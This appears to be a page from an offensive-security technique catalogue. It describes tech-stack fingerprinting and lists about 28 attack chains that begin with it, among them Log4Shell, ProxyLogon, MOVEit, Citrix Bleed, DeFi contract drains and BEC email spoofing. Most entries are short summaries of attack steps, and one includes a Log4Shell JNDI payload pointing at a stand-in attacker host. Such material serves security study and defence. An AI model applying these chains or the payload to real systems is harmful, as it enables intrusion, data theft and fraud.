Tech Stack Fingerprinting
Identify frameworks, CMS, server, JS libs via headers, cookies, error pages, /robots.txt — Wappalyzer / WhatWeb.
§ Where this technique fits
W-RECON-FINGERPRINT is catalogued under the Reconnaissance tactic of the offensive-security kill-chain. It appears in 28 approved dossiers in the registry, at step 1.1 on average.
§ Dossiers chaining this technique
- step 1 / 5
Vesting beneficiary replace → silently drain stream
Bug in a custom vesting contract allows anyone to call setBeneficiary on existing schedules. Replace beneficiary with attacker address; legitimate token stream now flows to attacker until released funds are noticed.
- step 1 / 5
ERC-4337 paymaster sponsor drain
A paymaster sponsors all UserOperations without per-user gas accounting. Spam tiny UserOps from many bundled addresses — paymaster pays the gas until its deposit hits zero.
- step 1 / 6
Spring4Shell (CVE-2022-22965) → JSP webshell on Tomcat
Send a crafted POST that uses Spring's data-binding to mutate Tomcat's logging configuration — turn its access log into a JSP file written under webapps/, then request it.
- step 1 / 4
Uninitialised UUPS proxy implementation → brick contracts
UUPS upgradeable contracts must initialise the implementation contract itself. If skipped, anyone can call `initialise()` and become its owner — then call `selfdestruct` to brick every proxy referencing it (Parity Multisig 2017).
- step 1 / 6
Log4Shell (CVE-2021-44228) → RCE → lateral
Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.
- step 1 / 6
F5 BIG-IP iControl auth bypass (CVE-2022-1388) → root on LB
Connection-header smuggling bypasses iControl REST auth, leading to command-injection RCE as root. Load balancers see all traffic — recover TLS keys, session cookies, internal SSO config.
- step 1 / 5
Apache Struts S2-045 (CVE-2017-5638) → Equifax-style breach
Crafted Content-Type header is parsed as OGNL — execute commands as the app user. The 2017 Equifax breach origin: unpatched Struts endpoint exposed to the internet.
- step 1 / 6
MOVEit Transfer (CVE-2023-34362) → mass data exfil (Cl0p)
Pre-auth SQLi in MOVEit's web UI forges an admin session. .NET deserialisation chain drops a webshell as SYSTEM. Cl0p's 2023 mass-exfil playbook: download every file under /var/files.
- step 1 / 6
Citrix Bleed → steal authenticated session → MFA bypass
Send a long Host header to a vulnerable NetScaler — memory disclosure leaks an authenticated session token already past MFA. Replay the token to log into the corporate VPN.
- step 1 / 6
Ivanti Pulse Connect Secure → pre-auth RCE → corporate VPN takeover
Two-stage chain (auth bypass + command injection) lands root on the Pulse appliance. Exfil VPN configs, pivot through the tunnel into the corporate network.
- step 1 / 6
FortiGate SSL-VPN pre-auth RCE → config theft
Pre-auth heap overflow / format-string against FortiGate sslvpnd grants root on the appliance. Pull the running config, decrypt stored RADIUS / LDAP / VPN-user secrets.
- step 1 / 6
Header smuggling → gateway sees vendor, mailbox sees attacker
Crafted RFC-edge headers cause SPF/DMARC to validate against one From while Outlook renders the other — slips past Microsoft Defender / Proofpoint and lands as a 'verified' message.
- step 1 / 6
AXFR → discover shadow-IT staging → exploitable web app
DNS server allows unrestricted AXFR. Pull the full zone, find admin- / staging- / dev- hostnames never linked, hit one with default creds / leftover debug routes.
- step 1 / 7
Permissive SPF / DMARC p=none → CEO impersonation BEC
Target publishes SPF ~all and DMARC p=none. Send mail from attacker IP with a forged From: <ceo@target.com>; gateway delivers as-is. Combine with display-name spoof for a credible BEC.
- step 1 / 6
Reentrancy → drain vault contract
Vulnerable withdraw() sends ETH before updating balance. Attacker contract re-enters via fallback() until the vault is empty — the canonical DAO-2016 pattern.
- step 1 / 6
Cross-chain bridge validator-set bypass → mint wrapped tokens
Bridge's signature-set check is off-by-one (Nomad-class) or accepts a zero address (Ronin-class). Mint wrapped tokens on the destination chain without locking on the source.
- step 1 / 6
Padding oracle → forge admin session cookie
App encrypts session cookies with AES-CBC and reveals padding-validity via a 500/200 differential. Decrypt the cookie, forge an admin cookie, log in without credentials.
- step 1 / 6
Flash loan + oracle manipulation → drain DEX
DeFi contract reads spot price from a single pool. Borrow a flash loan, distort the pool, exploit the dependent contract while price is wrong, repay the loan in the same transaction.
- step 1 / 6
ProxyShell → SYSTEM on Exchange → DA
Pre-auth ProxyShell chain (path confusion + EWS email-to-PowerShell + arbitrary file write) deploys a webshell as SYSTEM. Same post-exploitation as ProxyLogon.
- step 1 / 6
ProxyLogon → webshell on Exchange → DA
Unauth SSRF + auth bypass against on-prem Exchange (CAS) — write a webshell as SYSTEM on the Exchange server, dump LSASS for cached domain creds, pivot to DA.
- step 1 / 5
CVE-2024-21626 (Leaky Vessels) → container escape
Outdated runc lets a malicious image escape during 'docker build' or 'docker run' via a leaked file descriptor pointing at the host filesystem.
- step 1 / 6
Java deserialization → ysoserial → RCE
An endpoint deserializes a Java object from user-controlled bytes. ysoserial produces a gadget chain whose readObject() reaches Runtime.exec().
- step 1 / 5
Server-side prototype pollution → auth bypass → RCE
Merge / clone helper on user input pollutes Object.prototype. A later code path reads `isAdmin` from a fresh object and gets true — then a child-process gadget reaches RCE.
- step 1 / 6
SSTI (Jinja2) → sandbox escape → RCE
User input rendered as a Jinja2 template instead of escaped. Escape the sandbox via __class__.__mro__ to reach subprocess and execute commands.
- step 1 / 6
JWT RS256 → HS256 algorithm confusion → admin
Server verifies any algorithm declared in the JWT header. Sign an HS256 token using the public RSA key as the HMAC secret — server accepts it as legit.
- step 2 / 6
Unpatched Confluence (CVE-2023-22515) → internal foothold
Internal Confluence instance reachable from the corporate VLAN. Trivial privilege-escalation CVE creates an admin user; webshell uploaded; pivot into AD service accounts.
- step 2 / 8
SQLi (UNION) → DB dump → admin login
Discover a UNION-based SQL injection on a search/listing endpoint, enumerate the schema, dump the users table, and authenticate as an admin.
- step 3 / 6
Origin IP bypass → direct attack on backend
Find the real origin IP behind the CDN via CT logs / DNS history / SSL fingerprinting. Connect directly to origin, bypassing WAF + caching + rate-limit; run noisy attacks (SQLi / RCE) that the edge would have blocked.
§ What commonly comes next
- 01 API Endpoint Discovery (seen 1×) · W-RECON-API-DISCO · Reconnaissance
- 02 Apache Struts Content-Type RCE (S2-045 / CVE-2017-5638) (seen 1×) · CVE-STRUTS-S2-045 · Initial Access
- 03 Atlassian Confluence / Jira RCE (seen 1×) · SAAS-ATLAS-CVE · Initial Access
- 04 CDN Origin Bypass (seen 1×) · CDN-ORIGIN-BYPASS · Defense Evasion
- 05 Citrix Bleed (CVE-2023-4966) (seen 1×) · VPN-CITRIX-BLEED · Credential Access
- 06 Cross-Chain Bridge Exploit (seen 1×) · W3-BRIDGE-EXPLOIT · Impact
- 07 DMARC Bypass (p=none / sub-policy) (seen 1×) · EM-DMARC-BYPASS · Initial Access
- 08 Deserialization — Java (ysoserial) (seen 1×) · W-DESER-JAVA · Execution